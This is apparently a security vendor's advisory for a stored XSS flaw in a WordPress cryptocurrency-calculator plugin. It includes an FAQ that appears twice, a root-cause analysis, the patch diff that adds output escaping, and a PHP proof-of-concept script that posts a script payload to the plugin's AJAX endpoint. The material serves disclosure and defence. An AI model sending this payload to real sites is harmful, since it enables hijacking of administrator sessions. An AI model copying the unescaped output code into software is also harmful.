What is CVE-2025-14554?

CVE-2025-14554 is a stored cross-site scripting (XSS) vulnerability found in the Sell BTC – Cryptocurrency Selling Calculator plugin for WordPress. It allows unauthenticated attackers to inject malicious scripts into order records that execute when an administrator views the Orders page.

How does the vulnerability work?

The vulnerability exists due to insufficient input sanitization and output escaping in the plugin’s code. Attackers can send crafted AJAX requests to the ‘orderform_data’ endpoint, injecting JavaScript payloads that are stored in the database and executed when administrators access the Orders page.

Who is affected by this vulnerability?

All installations of the Sell BTC – Cryptocurrency Selling Calculator plugin up to and including version 1.5 are affected. Administrators should check their plugin version in the WordPress admin dashboard to determine if they are vulnerable.

How can I check if my site is vulnerable?

To check if your site is vulnerable, navigate to the Plugins section in your WordPress admin dashboard and look for the Sell BTC – Cryptocurrency Selling Calculator plugin. If the version is 1.5 or lower, your site is at risk.

How can I fix the vulnerability?

The vulnerability is patched in version 1.6 of the plugin. Administrators should update to this version immediately to mitigate the risk of exploitation.

What does the CVSS score of 7.2 indicate?

A CVSS score of 7.2 indicates a high severity vulnerability. This means that successful exploitation could lead to significant consequences, such as unauthorized access to sensitive data or administrative control over the WordPress site.

What are the practical risks of this vulnerability?

Exploitation of this vulnerability can lead to session hijacking, theft of administrative credentials, or unauthorized changes to site content. Attackers could also install backdoors or redirect administrators to malicious sites.

What measures can I take to mitigate the risk?

In addition to updating the plugin, administrators should regularly review and sanitize user inputs, implement web application firewalls, and monitor site activity for suspicious behavior to further reduce risks.

How does the proof of concept demonstrate the vulnerability?

The proof of concept illustrates how an attacker can use a crafted payload to exploit the vulnerability by sending a malicious AJAX request. This request injects a script that executes when an administrator views the Orders page, demonstrating the ease of exploitation.

What is stored cross-site scripting?

Stored cross-site scripting (XSS) occurs when an attacker is able to inject malicious scripts into a web application, which are then stored in the database and executed in the context of users who access the affected data. This can compromise user sessions and lead to unauthorized actions.

What steps should I take after updating the plugin?

After updating the plugin, administrators should conduct a thorough review of their site for any signs of compromise. Additionally, they should consider changing administrative passwords and reviewing user roles to ensure no unauthorized access has occurred.

Is there any additional information available about this vulnerability?

For more detailed information, administrators can refer to the official CVE database entry for CVE-2025-14554, security advisories from the plugin developers, and best practices for securing WordPress installations.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-14554: Sell BTC – Cryptocurrency Selling Calculator <= 1.5 – Unauthenticated Stored Cross-Site Scripting via 'orderform_data' AJAX Action (sell-btc-by-hayyatapps)

CVE ID CVE-2025-14554

Plugin sell-btc-by-hayyatapps

Severity High (CVSS 7.2)

CWE 79

Vulnerable Version 1.5

Patched Version 1.6

Disclosed January 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14554:
The Sell BTC – Cryptocurrency Selling Calculator WordPress plugin contains an unauthenticated stored cross-site scripting vulnerability in versions up to and including 1.5. The vulnerability exists in the order data display functionality within the admin dashboard, allowing attackers to inject malicious scripts that execute when administrators view the Orders page. This vulnerability received a CVSS score of 7.2 (High severity).

The root cause is insufficient output escaping when rendering user-supplied order data in the plugin’s admin interface. The vulnerable code in sell-btc-by-hayyatapps/Pages/orders.php lines 27-35 and 46-53 directly concatenates user-controlled data from the $data array into HTML output without proper escaping. The affected fields include happs-FirstName, happs-LastName, happs-Email, happs-Phone, and several other order data fields. This lack of escaping allows JavaScript payloads to persist in the database and execute in the browser context of administrators viewing the orders.

Exploitation occurs via the ‘orderform_data’ AJAX action endpoint at /wp-admin/admin-ajax.php. Unauthenticated attackers can send POST requests with action=orderform_data containing malicious JavaScript payloads in any of the user-controlled fields. The plugin stores these values without proper sanitization. When an administrator accesses the Orders page in the WordPress admin dashboard (wp-admin/admin.php?page=sell-btc-orders), the malicious scripts execute in the administrator’s browser session, potentially leading to session hijacking or administrative account compromise.

The patch in version 1.6 adds WordPress esc_attr() function calls to all user-controlled data outputs in the orders.php file. Each concatenated data field now passes through esc_attr() before being inserted into HTML table cells and paragraph elements. This ensures that any HTML special characters, including angle brackets and quotes, are properly encoded as HTML entities, preventing script execution while preserving the data’s display value. The version number in sell-btc.php also increments from 1.5 to 1.6.

Successful exploitation allows unauthenticated attackers to execute arbitrary JavaScript in the context of WordPress administrators. This can lead to complete site compromise through session hijacking, administrative credential theft, backdoor installation via plugin/theme editing, or content manipulation. Attackers could also redirect administrators to phishing pages or perform actions on their behalf, potentially resulting in full control over the WordPress installation and associated data.

Differential between vulnerable and patched code

Code Diff

--- a/sell-btc-by-hayyatapps/Pages/orders.php
+++ b/sell-btc-by-hayyatapps/Pages/orders.php
@@ -27,15 +27,15 @@
     $data = $data_all[$i];
 echo '
 <tr>
-<td>'.$data["happs-FirstName"].'</td>
-<td>'. $data["happs-LastName"].'</td>
-<td>'. $data["happs-Email"].'</td>
-<td>'. $data["happs-Phone"].'</td>
-<td>'.$data["hidden-calc-from"]." ".$data["hidden-calc-amount"].' </td>
-<td>'.$data["hidden-calc-to"].'</td>
-<td>'.$data["hidden-calc-rate"].'</td>
-<td>'. $data["hidden-calc-fee"].'</td>
-<td>'. $data["hidden-calc-getamount"].'</td>
+<td>'. esc_attr( $data["happs-FirstName"]).'</td>
+<td>'.  esc_attr( $data["happs-LastName"]).'</td>
+<td>'.  esc_attr( $data["happs-Email"]).'</td>
+<td>'.  esc_attr( $data["happs-Phone"]).'</td>
+<td>'. esc_attr( $data["hidden-calc-from"])." ".esc_attr($data["hidden-calc-amount"]).' </td>
+<td>'. esc_attr( $data["hidden-calc-to"]).'</td>
+<td>'. esc_attr( $data["hidden-calc-rate"]).'</td>
+<td>'.  esc_attr( $data["hidden-calc-fee"]).'</td>
+<td>'.  esc_attr( $data["hidden-calc-getamount"]).'</td>

 <td><span data-happs-view-id="'.$i.'">View<span></td>
 </tr>
@@ -46,14 +46,14 @@

 <tr style="text-align:left;background-color: #00bcd412;display:none;" happs-detail-id="'.$i.'">
 <td colspan="10">
-<p><b>Address Line 1:</b> '.$data["happs-AddressLine1"].'</p>
-<p><b>Address Line 2:</b> '.$data["happs-AddressLine2"].'</p>
-<p><b>City:</b> '.$data["happs-City"].'</p>
-<p><b>State:</b> '.$data["happs-State"].'</p>
-<p><b>Country:</b> '.$data["happs-Country"].'</p>
-<p><b>Custom Message:</b> '.$data["happs-CustomMessage"].'</p>
-<p><b>Untitled Input 1:</b> '.$data["happs-UntitledInput1"].'</p>
-<p><b>Untitled Input 2:</b> '.$data["happs-UntitledInput2"].'</p>
+<p><b>Address Line 1:</b> '.esc_attr($data["happs-AddressLine1"]).'</p>
+<p><b>Address Line 2:</b> '.esc_attr($data["happs-AddressLine2"]).'</p>
+<p><b>City:</b> '.esc_attr($data["happs-City"]).'</p>
+<p><b>State:</b> '.esc_attr($data["happs-State"]).'</p>
+<p><b>Country:</b> '.esc_attr($data["happs-Country"]).'</p>
+<p><b>Custom Message:</b> '.esc_attr($data["happs-CustomMessage"]).'</p>
+<p><b>Untitled Input 1:</b> '.esc_attr($data["happs-UntitledInput1"]).'</p>
+<p><b>Untitled Input 2:</b> '.esc_attr($data["happs-UntitledInput2"]).'</p>
 </td>
 </tr>

--- a/sell-btc-by-hayyatapps/sell-btc.php
+++ b/sell-btc-by-hayyatapps/sell-btc.php
@@ -10,7 +10,7 @@
  * Plugin Name: Sell BTC By HayyatApps
  * Plugin URI: https://hayyatapps.com/sell-btc-by-hayyatapps/
  * Description: Sell bitcoin and other cryptocurrencies on your website with option to set custom margins at the backend from your WordPress Admin Dashboard.
- * Version:     1.5
+ * Version:     1.6
  * Author:      Hayat Developers | Sell BTC By HayyatApps - Made for WordPress
  * Author URI:  https://hayyatapps.com
  * Text Domain: Sell BTC By HayyatApps

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-14554 - Sell BTC - Cryptocurrency Selling Calculator <= 1.5 - Unauthenticated Stored Cross-Site Scripting via 'orderform_data' AJAX Action

<?php

$target_url = 'http://vulnerable-site.com/wp-admin/admin-ajax.php';

// XSS payload that will execute when admin views orders page
$xss_payload = '<script>alert(document.domain)</script>';

// Prepare malicious order data with XSS payload
$post_data = array(
    'action' => 'orderform_data',
    'happs-FirstName' => $xss_payload,
    'happs-LastName' => 'Test',
    'happs-Email' => 'test@example.com',
    'happs-Phone' => '1234567890',
    'hidden-calc-from' => 'BTC',
    'hidden-calc-amount' => '1',
    'hidden-calc-to' => 'USD',
    'hidden-calc-rate' => '50000',
    'hidden-calc-fee' => '0.5',
    'hidden-calc-getamount' => '49999.5',
    'happs-AddressLine1' => 'Test Address',
    'happs-City' => 'Test City',
    'happs-State' => 'Test State',
    'happs-Country' => 'Test Country',
    'happs-CustomMessage' => 'Test message',
    'happs-UntitledInput1' => 'Test input 1',
    'happs-UntitledInput2' => 'Test input 2'
);

// Initialize cURL session
$ch = curl_init();

// Set cURL options
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Check for errors
if (curl_errno($ch)) {
    echo 'cURL Error: ' . curl_error($ch) . "n";
} else {
    echo "HTTP Status: $http_coden";
    echo "Response: $responsen";
    echo "Payload injected. Visit wp-admin/admin.php?page=sell-btc-orders as admin to trigger XSS.n";
}

// Close cURL session
curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2025-14554?
Overview of the vulnerability
CVE-2025-14554 is a stored cross-site scripting (XSS) vulnerability found in the Sell BTC – Cryptocurrency Selling Calculator plugin for WordPress. It allows unauthenticated attackers to inject malicious scripts into order records that execute when an administrator views the Orders page.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability exists due to insufficient input sanitization and output escaping in the plugin’s code. Attackers can send crafted AJAX requests to the ‘orderform_data’ endpoint, injecting JavaScript payloads that are stored in the database and executed when administrators access the Orders page.
Who is affected by this vulnerability?
Identifying vulnerable installations
All installations of the Sell BTC – Cryptocurrency Selling Calculator plugin up to and including version 1.5 are affected. Administrators should check their plugin version in the WordPress admin dashboard to determine if they are vulnerable.
How can I check if my site is vulnerable?
Version verification process
To check if your site is vulnerable, navigate to the Plugins section in your WordPress admin dashboard and look for the Sell BTC – Cryptocurrency Selling Calculator plugin. If the version is 1.5 or lower, your site is at risk.
How can I fix the vulnerability?
Updating the plugin
The vulnerability is patched in version 1.6 of the plugin. Administrators should update to this version immediately to mitigate the risk of exploitation.
What does the CVSS score of 7.2 indicate?
Understanding risk levels
A CVSS score of 7.2 indicates a high severity vulnerability. This means that successful exploitation could lead to significant consequences, such as unauthorized access to sensitive data or administrative control over the WordPress site.
What are the practical risks of this vulnerability?
Potential impacts on site security
Exploitation of this vulnerability can lead to session hijacking, theft of administrative credentials, or unauthorized changes to site content. Attackers could also install backdoors or redirect administrators to malicious sites.
What measures can I take to mitigate the risk?
Preventive actions for administrators
In addition to updating the plugin, administrators should regularly review and sanitize user inputs, implement web application firewalls, and monitor site activity for suspicious behavior to further reduce risks.
How does the proof of concept demonstrate the vulnerability?
Example of exploitation
The proof of concept illustrates how an attacker can use a crafted payload to exploit the vulnerability by sending a malicious AJAX request. This request injects a script that executes when an administrator views the Orders page, demonstrating the ease of exploitation.
What is stored cross-site scripting?
Definition and implications
Stored cross-site scripting (XSS) occurs when an attacker is able to inject malicious scripts into a web application, which are then stored in the database and executed in the context of users who access the affected data. This can compromise user sessions and lead to unauthorized actions.
What steps should I take after updating the plugin?
Post-update best practices
After updating the plugin, administrators should conduct a thorough review of their site for any signs of compromise. Additionally, they should consider changing administrative passwords and reviewing user roles to ensure no unauthorized access has occurred.
Is there any additional information available about this vulnerability?
Further resources
For more detailed information, administrators can refer to the official CVE database entry for CVE-2025-14554, security advisories from the plugin developers, and best practices for securing WordPress installations.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations